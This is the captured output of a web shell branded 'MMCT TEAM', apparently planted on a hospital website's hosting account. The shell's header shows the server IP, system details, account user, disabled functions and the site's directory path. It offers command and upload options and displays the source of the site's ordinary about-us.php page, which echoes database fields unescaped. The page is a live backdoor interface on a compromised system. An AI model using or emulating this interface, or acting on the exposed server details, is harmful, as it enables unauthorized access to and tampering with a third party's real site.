MMCT TEAM
Server IP : 82.197.83.136  /  Your IP : 216.73.216.82
Web Server : LiteSpeed
System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u163988420 ( 163988420)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : ON
Directory (0755) :  /home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u163988420/domains/brshastrihospital.com/public_html/AACSITE/about-us.php
<?php include 'header.php'; ?>
<!-- ========================
       page title 
    =========================== -->
    <section class="page-title page-title-layout5 text-center">
      <div class="bg-img"><img src="assets/images/backgrounds/6.jpg" alt="background"></div>
      <div class="container">
        <div class="row">
          <div class="col-12">
            <h1 class="pagetitle__heading">About Us</h1>
            <nav>
              <ol class="breadcrumb justify-content-center mb-0">
                <li class="breadcrumb-item"><a href="index.php">Home</a></li>
                <li class="breadcrumb-item active" aria-current="page">About Us</li>
              </ol>
            </nav>
          </div><!-- /.col-xl-6 -->
        </div><!-- /.row -->
      </div><!-- /.container -->
    </section><!-- /.page-title -->



      <!-- ========================
       shop single
    =========================== -->
    <section class="shop pb-40 pt-0">
      <div class="container">
        <div class="row">
          <?php
          $sel = "SELECT * FROM about"; 
          $res = mysqli_query($con,$sel);
          while($r = mysqli_fetch_array($res))
          {
            ?>
          <div class="col-12">
            <div class="alert alert-primary d-flex flex-wrap justify-content-between align-items-center mb-30">
              <h3 class="alert__title my-1"><?php echo $r[1]; ?></h3>
              
            </div><!-- /.alert-panel-->
            <div class="row product-item-single">
              <div class="col-sm-6">
                <div class="product__img">
                  <img src="br-admin/uploads/about/<?php echo $r[9]; ?>" class="about-image" alt="product">
                </div><!-- /.product-img -->
              </div>
              <div class="col-sm-6">
                <h1 class="product__title">About Us</h1>

                <span class="product__price mb-20"><?php echo $r[1]; ?></span>
                <div class="product__desc">
                  <p><?php echo $r[2]; ?></p>
                  <ul class="list-items list-unstyled mb-60 pl-40">
              <li><?php echo $r[3]; ?></li>
              <li><?php echo $r[4]; ?></li>
              <li><?php echo $r[5]; ?></li>
              <li><?php echo $r[6]; ?></li>
              <li><?php echo $r[7]; ?></li>
            </ul>
                </div><!-- /.product-desc -->

              </div>
            </div><!-- /.row -->
            
          </div><!-- /.col-12 -->
            <?php
          }
        ?>
        </div><!-- /.row -->
      </div><!-- /.container -->
    </section><!-- /.shop single -->
      <!-- ========================
     gallery
    =========================== -->




















<?php include 'footer.php'; ?>

MMCT - 2023